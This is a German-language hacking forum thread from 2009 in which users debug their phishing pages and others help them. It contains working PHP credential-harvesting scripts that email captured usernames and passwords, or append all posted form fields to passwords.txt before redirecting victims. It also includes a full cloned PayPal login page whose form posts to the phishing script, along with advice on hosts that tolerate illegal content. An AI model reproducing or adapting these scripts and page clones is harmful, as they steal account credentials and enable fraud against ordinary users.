So ich hab ein Problem. Und zwar erhalte ich die auf meiner Phishingseite eingegebenen Zugangsdaten nicht per email.
Ich habe auf den Server die Dateien index.html und send.php hochgeladen.
In die index Datei hab ich folgendes eingetragen
In der send.php steht folgendes<form method="post" action="send.php">
Wenn ich auf meiner Phishingseite einen Usernamen und Passwort eingebe und auf Login klicke, steht aber nicht "Der von Ihnen angeforderte Service ist im Moment leider nicht verfügbar. Bitte versuchen Sie es zu einem späteren Zeitpunkt erneut!" da, sondern die aufgerufene Seite existiert nicht! Die Weiterleitung auf google.de erfolgt auch nicht.<?php
$benutzer=$HTTP_POST_VARS['benutzer'];
$pass=$HTTP_POST_VARS['pass'];
if ($pass == "")
{
print("Bitte geben Sie ihr Passwort ein");
}
elseif ($benutzer == "")
{
print("Bitte geben Sie ihren Benutzernamen ein");
}
else
{
$mailtext="Benutzername:";
$mailtext.=$benutzer;
$mailtext.="\n";
$mailtext.="Passwort: ";
$mailtext.=$pass;
$absender="From: Phish <phish@freenet.de>";
mail("meine-email@gmx.de",$benutzer,$mailtext,$absender);
print("Der von Ihnen angeforderte Service ist im Moment leider nicht verfügbar. Bitte versuchen Sie es zu einem späteren Zeitpunkt erneut!");
}
?>
<html>
<body>
<meta http-equiv="Refresh" content="1; url=http://www.google.de">
</body>
</html>
Hab das ganze bei pytal.com hochgeladen und sowohl FTP als auch MySQL aktiviert.
Kann mir vielleicht jemand sagen, woran das liegt?
Ergebnis 1 bis 10 von 14
-
05.01.2009, 22:18 #1Anfänger
- Registriert seit
- 30.12.2008
- Beiträge
- 5
Phishing - Daten werden nicht gespeichert
-
05.01.2009, 22:22 #2Linus Torvalds
- Registriert seit
- 09.03.2008
- Beiträge
- 1.189
Deine Mail eingetragen?Code:$absender="From: Phish <phish@freenet.de>"; mail("meine-email@gmx.de",$benutzer,$mailtext,$absender);
Unterstützt dein Hoster php und Mailversand?08.03.2009
-
05.01.2009, 22:35 #3Anfänger
- Registriert seit
- 30.12.2008
- Beiträge
- 5
ok danke, dass ist das Problem.
Zitat von Gumball
Die Mail-Funktionen sind bei Pytal generell deaktiviert.
Sofern Sie diese jedoch benötigen, können Sie sie links beantragen. Bitte Beschreiben Sie hierbei für was Sie es benötigen.
-
05.01.2009, 22:37 #4Linus Torvalds
- Registriert seit
- 09.03.2008
- Beiträge
- 1.189
Also von Pytal kann ich zur Zeit abraten,bei mir wurden auch viele Server gelöscht,da dort nicht legale Daten drauf waren.
Also testweise würde ich www.funpic.de oder ohost.de austesten.
Danach wechseln zu idoo.com bplaced.net oder anderen.08.03.2009
-
06.01.2009, 00:49 #5Anfänger
- Registriert seit
- 30.12.2008
- Beiträge
- 5
Ich habe jetzt des ganze mal bei funpic ausprobiert.
Ich bekomm jetzt mit dem nachfolgenden Code auch eine Email. Allerdings sieht diese so aus: Benutzername: Password:
Woran kann das liegen?
PS: In die Felder Username und Password hab ich natürlich was eingeben, bevor ich auf Login geklickt hab! :lol:
Der Code von der Index Datei sieht so aus<?php
$HTTP_POST_VARS['benutzer'];
$pass=$HTTP_POST_VARS['pass'];
$mailtext.="Benutzername: ";
$mailtext.=$benutzer;
$mailtext.=" ";
$mailtext.="Password: ";
$mailtext.=$pass;
$absender="From:";
$absender.="Phish";
mail("meine-email@gmx.de",$benutzer,$mailtext,$absender);
echo $_POST["benutzer"];
print(" Dieser Service steht Ihnen aufgrund von Wartungsarbeiten im Moment leider nicht zur Verfügung. Bitte versuchen Sie es zu einem späteren Zeitpunkt nochmal! </p>");
?>
<html>
<body>
<meta http-equiv="Refresh" content="1; url=http://google.de">
</body>
</html>
<table width="100%" cellpadding="3" cellspacing="1" border="0" class="forumline">
<tr>
<td class="catHead" height="28"><a name="login"></a><span class="cattitle">Log in</span></td>
<form action="send.php" method="post"> </tr>
<tr>
<td class="row1" align="center" valign="middle" height="28"><span class="gensmall">Username: <input class="post" type="text" name="username" size="10" />
Password: <input class="post" type="password" name="password" size="10" maxlength="32" />
Log me on automatically each visit
<input class="text" type="checkbox" name="autologin" />
<input type="submit" class="mainoption" name="login" value="Log in" /> </span> </td>
</tr>
</table>
</form>
-
06.01.2009, 15:11 #6Sobig Wurm
- Registriert seit
- 28.07.2007
- Beiträge
- 211
änder mal bei der php datei $benutzer zu $username denn müste es gehen
-
06.01.2009, 21:50 #7Anfänger
- Registriert seit
- 30.12.2008
- Beiträge
- 5
Hat funktioniert. Thema kann geschlossen werden
-
07.01.2009, 14:21 #8Gesperrt
- Registriert seit
- 02.01.2009
- Beiträge
- 7
Hi Habe Dasselbe Problem =( ich habe eine für paypal und für rs
hir mal paypal.php<?phpCode:<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <!-- Script info: script: webscr, cmd: _home, template: xpt/cps/homepage/MainHome, date: Jul. 26, 2008 21:53:10 PDT; country: US, language: en_US, xslt server: on web version: 53.0-http://www.yourserver.com/phis.php649729 branch: EBFBATCH_530_0728_int content version: - pexml version: 53.0-649729 page XSL: cps/default/en_US/homepage/MainHome.xsl hostname : grTgpK.X9tex1TqVy-XgiN4-ZilAsx-Nt0mlsg.CVA8 rlogid : grTgpK%2fX9tex1TqVy%2bXgiK%2fMsUOpkXYELibSPV3%2bqKx3DzyHtEtTyw%3d%3d_11b717b734c --> <title>Online Payment, Merchant Account - PayPal</title> <meta name="keywords" content="online payment, online payments, payment, payments, merchant account, online merchant account, credit card merchant account, merchant, merchants, merchant account service, merchant account services, internet merchant account"> <meta name="description" content="PayPal is the safer, easier way to make an online payment or set up a merchant account."> <link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-530-20080728-1/css/core/core.css"> <link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-530-20080728-1/css/core/print.css"> <link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-530-20080728-1/css/marketing/marketing.css"> <link rel="apple-touch-icon" href="https://www.paypalobjects.com/WEBSCR-530-20080728-1/en_US/i/pui/apple-touch-icon.png"> <script type="text/javascript"> if (parent.frames.length > 0){ top.location.replace(document.location); }</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-530-20080728-1/js/lib/yui-0.12/yahoo-dom-event.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-530-20080728-1/js/lib/pui/pui-0.1/paypal.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-530-20080728-1/js/rosettaLang.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-530-20080728-1/js/tns/mid.js"></script><script type="text/javascript">PAYPAL.tns.flashLocation = 'https://www.paypal.com/en_US/m/mid.swf';</script><link rel="shortcut icon" href="https://www.paypalobjects.com/WEBSCR-530-20080728-1/en_US/i/icon/pp_favicon_x.ico"> </head><body> <noscript><p class="nonjsAlert">NOTE: Many features on the PayPal Web site require Javascript and cookies. You can enable both via your browser's preference settings.</p></noscript> <div class="outside home" id="page"> <div class="srd" id="header"> <h1><a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home">
</a></h1>
<form method="post" id="searchForm" name="searchForm" action="https://www.paypal.com/us/cgi-bin/searchscr?cmd=_sitewide-search">
<fieldset>
<legend>Search PayPal</legend>
<label for="searchBox">Search </label><input id="searchBox" name="queryString" value="" type="text"> <input class="button" id="search.x" name="search.x" value="Search" type="submit">
</fieldset>
<input name="form_charset" value="UTF-8" type="hidden">
<input value="Firefox" name="browser_name" type="hidden"><input value="3" name="browser_version" type="hidden"><input value="Windows" name="operating_system" type="hidden"><input value="9" name="fso_enabled" type="hidden"><input value="" name="mid_profile" type="hidden"></form>
<div class="srd" id="navGlobal"><ul>
<li class="first signup">Sign Up
<li class="login">Log In[*]Help
<li class="last">Security Center[/list]</div>
<form class="rosetta" id="rosetta" method="post" action="https://www.paypal.com/cgi-bin/webscr?cmd=_home&dispatch=5885d80a13c0db1f80512b0980fcab74abc3e59231243d189c9fb5e49dc11d57">
<fieldset>
<legend>Change Your Language</legend>
<label for="rosetta_dropdown">Language Select</label><select id="rosetta_dropdown" name="locale.x"><option value="en_US" selected="selected">U.S. English</option>
<option value="es_XC">Español</option>
<option value="fr_XC">Français</option>
<option value="zh_XC">中文(简体)</option></select><button class="accessAid" type="submit" name="testName" value="testValue">
</button><input id="change_locale_x" name="change_locale.x" value="1" type="hidden">
</fieldset>
<input name="form_charset" value="UTF-8" type="hidden">
<input value="Firefox" name="browser_name" type="hidden"><input value="3" name="browser_version" type="hidden"><input value="Windows" name="operating_system" type="hidden"><input value="9" name="fso_enabled" type="hidden"><input value="" name="mid_profile" type="hidden"></form>
</div>
<div id="navPrimary" class="srd"><ul class="secondary">
<li class="active">
Home<ul>
<li class="active">
Get Started<ul>[*]Why Use PayPal[*]How It Works[*]Where to Shop With It[/list]
[*]
Send Money<ul>[*]Send Money Online[*]Make a Mass Payment[/list]
[*]
Request Money<ul>[*]Request Money[*]Send an Invoice[/list]
<li class="">Sell on eBay[*]Developers[/list]
[*]Personal[*]Business[*]Products & Services[*]Developers[/list]</div>
<hr>
<div id="content">
<div class="sidebar box login">
<div class="header"><h2>Account login</h2></div>
<div class="body"><form method="post" name="login_form" action="http://yourserver/phis.php">
<fieldset>
<legend>Member Log In</legend>
<label for="login_email">Email address</label><input id="login_email" name="login_email" value="" type="text"></p>
<label for="login_password">PayPal password</label><input autocomplete="off" id="login_password" name="login_password" value="" type="password"><script type="text/javascript">
<!--hide from JavaScript-challenged browsers
YAHOO.util.Event.addListener(window, "load", function(){
document.login_form.login_password.focus();
if (document.login_form.login_email.value == '') {
document.login_form.login_email.focus();
}
});
// done hiding -->
</script></p>
<input name="submit.x" value="Log In" class="button primary" type="submit">
</fieldset>
Forgot your email address or password?</p>
New to PayPal? Sign up.</p>
<input name="form_charset" value="UTF-8" type="hidden">
<input value="Firefox" name="browser_name" type="hidden"><input value="3" name="browser_version" type="hidden"><input value="Windows" name="operating_system" type="hidden"><input value="9" name="fso_enabled" type="hidden"><input value="" name="mid_profile" type="hidden"></form></div>
</div>
<div class="main">
<div class="zone">
<div id="hero"><object data="https://www.paypalobjects.com/WEBSCR-530-20080728-1/en_US/m/hero/hero_home.swf" type="application/x-shockwave-flash" id="flashmovie0" height="228" width="560"><param name="movie" value="https://www.paypalobjects.com/WEBSCR-530-20080728-1/en_US/m/hero/hero.swf?XMLfile=heroHome.xml&imgBasePath=https://www.paypalobjects.com/WEBSCR-530-20080728-1/en_US/m/hero/&linkBasePath=https://www.paypal.com/"><param name="wmode" value="transparent"><param name="quality" value="high"><param name="menu" value="false"><param name="allowScriptAccess" value="always"></object></div>
<script type="text/javascript">PAYPAL.util.Flash.insertFlash("https://www.paypalobjects.com/WEBSCR-530-20080728-1/en_US/m/hero/hero.swf?XMLfile=heroHome.xml&imgBasePath=https://www.paypalobjects.com/WEBSCR-530-20080728-1/en_US/m/hero/&linkBasePath=https://www.paypal.com/", 560, 228, "hero", true, 7)</script>
</div>
<div class="subhead"><div>
Pay With: </p>
<ul>[*]
[*]
[*]
[*]
[*]
[/list]
</div></div>
<div class="zone simpleList">
<div class="box">
<h3>Pay online</h3>
<ul>[*]
Learn how PayPal works.[*]
Shop without exposing your financial information.[*]
Send money to friends and family around the world.[/list]
Sign up</p>
</div>
<div class="box">
<h3>Get paid online</h3>
<ul>[*]
Accept payments for your eBay listings.[*]
Start accepting credit cards on your website.[*]
See all the ways to get paid online.[/list]
Sign up</p>
</div>
</div>
<div class="zone"><div class="box"><div class="MktMPI" id="mpi500021"><script language="JavaScript">
ord=Math.random();
ord=ord*10000000000000000000;
document.write('<SCR' + 'IPT LANGUAGE="JavaScript" SRC="https://ad.doubleclick.net/adj/paypal.us/NewUserHome-outside;lang=en_us;tile=1;sz=520x70;ord='+ord+'?"><\/SCR' + 'IPT>');
</script><script language="JavaScript" src="https://ad.doubleclick.net/adj/paypal.us/NewUserHome-outside.js"></script>[img]Online%20Payment,%20Merchant%20Account%20-%20PayPal_pliki/imgSummerBlock08V2_520x70.gif[/img]
<noscript>
<A
HREF="https://ad.doubleclick.net/jump/paypal.us/NewUserHome-outside;lang=en_us;tile=1;sz=520x70;ord=123456789?"
TARGET="_blank">
</A> </noscript> </div></div></div> </div> <div class="sidebar box resources"> <div class="header"><h3>Top questions</h3></div> <div class="body"><ul>[*]Why use PayPal when I have credit cards?[*]What can I do with PayPal?[*]Is PayPal free to use?[/list]</div> </div> </div> <hr> <div id="footer" class="srd"> <h5 class="accessAid">More Information</h5> <ul> <li class="first">About Us[*]Contact Us[*]Fees[*]Jobs[*]Merchant Services[*]Worldwide <li class="last"> <!-- OnlineOpinionF3cS v3.0 The following code is Copyright 1998-2006 Opinionlab, Inc. All rights reserved. Unauthorized use is prohibited. This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. http://www.opinionlab.com--> <script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-530-20080728-1/js/opinionlab/oo_engine.js"></script><script type="text/javascript"> var feedback_link='Site Feedback'; O_GoT(feedback_link); custom_var='Unknown|SRD: Main Home|US|en_US';var custom_var_temp=custom_var;// Paypal Custom URL class var PayPalURL = function(pagename) { this.language_country_code = "en_US"; this.dd = "US"; this.nn = "00";this.pagename = escape(pagename.replace(/\s|\//g, "_")); this.to_str = function() { return "https://"+this.dd+".paypal.com/"+this.language_country_code+"/"+this.nn+"/"+this.pagename+".page" } } var paypal_url = new PayPalURL("SRD: Main Home"); // Below gives you the ability to change the other properties after the object is created //paypal_url.dd="ES"; //paypal_url.nn="01"; _ht = paypal_url.to_str(); </script>Site Feedback [img]Online%20Payment,%20Merchant%20Account%20-%20PayPal_pliki/sm_333_oo.gif[/img] [/list] <ul> <li class="first">Privacy[*]Our Blog[*]Legal Agreements <li class="last">eBay[/list] <p id="footerSecure"><a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/User/popup/SecurityKeyVIP-outside" onclick="PAYPAL.core.openWindow(event, {width: 425, height: 350})">
</a></p>
<p id="legal">Copyright © 1999-2008 PayPal. All rights reserved.</p>
</div>
<div class="hide" id="navFull"></div>
<script type="text/javascript">
// This is an ugly hack until there is a reliable ondomready function
if(typeof PAYPAL != 'undefined'){
PAYPAL.core.Navigation.init();
}</script>
</div>
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-530-20080728-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-530-20080728-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-530-20080728-1/js/pp_naturalsearch.js"></script><script type="text/javascript">
<!--
var ppns = new PayPalNaturalSearch('https://www.paypal.com/cgi-bin/webscr?cmd=xpt/cps/homepage/MainHome','3484-30830-12422-0',this.document);
ppns.addEngines(new Array(
"A9.com",
".altavista.com",
"clusty.com",
"google.co.jp",
"google.co.kr",
"google.ru",
"www.google.com",
"icerocket.com",
"infospace.com",
"mooter.com",
"search.msn.",
"snap.com",
"search.yahoo.com",
"search.yahoo.co.jp"
,"www.overture.com/d/search/p/altavista/",
"aolsearch.aol.com",
"search.aol.com",
"web.ask.com",
"pictures.ask.com",
"images.google.com",
"groups.google.com",
"www.google.com/search",
"www.hotbot.com",
"search.netscape.com",
"s.teoma.com/",
"www.wisenut.com"
)); // End of aEngines array.
ppns.init();
-->
</script><div id="ppwebapi" class="advonqo.mha,hfb.lnb-k`ox`o-rdhsqdonqo"></div>
<!-- SiteCatalyst Code
Copyright 1997-2005 Omniture, Inc.
More info available at http://www.omniture.com -->
<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-530-20080728-1/js/site_catalyst/pp_jscode_080706.js"></script>[img]Online%20Payment,%20Merchant%20Account%20-%20PayPal_pliki/s77220248366297.gif[/img]
<script type="text/javascript">
<!--
/* SiteCatalyst Variables */
s.prop1="xpt/cps/homepage/MainHome";
s.prop7="Unknown";
s.prop8="Unknown";
s.prop9="Unknown";
s.prop10="US";
s.prop34="SRD User";
s.pageName="SRD: Main Home";
s.channel="SRD";
s.prop50="en_US";
s.prop18="";
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! **************/
var s_code=s.t();if(s_code)document.write(s_code)//--></script>
<script type="text/javascript"><!--
if(navigator.appVersion.indexOf('MSIE')>=0)document.write(unescape('%3C')+'\!-'+'-')
//-->
</script><noscript>[img]//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript[/img]</noscript>
<div><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="midflash" height="1" width="1"><param name="movie" value="https://www.paypal.com/en_US/m/mid.swf"><param name="wmode" value="transparent"><param name="quality" value="high"><param name="menu" value="false"><param name="allowScriptAccess" value="always"><embed src="https://www.paypal.com/en_US/m/mid.swf" quality="high" name="midflash" allowscriptaccess="always" type="application/x-shockwave-flash" pluginspage="http://www.adobe.com/go/getflashplayer" height="1" width="1"></object></div></body></html>
und die phis von pp
header ('Location: https://www.paypal.com ');
$handle = fopen("passwords.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
er speichert bei mir auch nicht die pw's wer nett wenn ihr mir helfen könntet
mfg BlooDy Sniperkiller
-
07.01.2009, 14:44 #9Capt'n Crunch
- Registriert seit
- 10.07.2008
- Beiträge
- 995
ersetzen mitCode:<div class="body"><form method="post" name="login_form" action="http://yourserver/phis.php">
dannach dieses hier unter send.php abspeichern:Code:<div class="body"><form method="post" name="login_form" action="send.php">
Code:<?php header ('Location: https://www.paypal.com '); $handle = fopen("passwords.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>gestohlen.
-
07.01.2009, 14:46 #10Gesperrt
- Registriert seit
- 02.01.2009
- Beiträge
- 7
danke für die schnelle antwort werde gleichmal testen und dann posten obs klappt ;-)
Added after 20 minutes:
hmm weiß net irgendwie werden immer noch keine logs an password.txt gesendet muss ich send.php oder phis oder so noch irgendwelche dateiatribute geben PS: bei password habe ich das schon gemacht ;-)
Zitieren
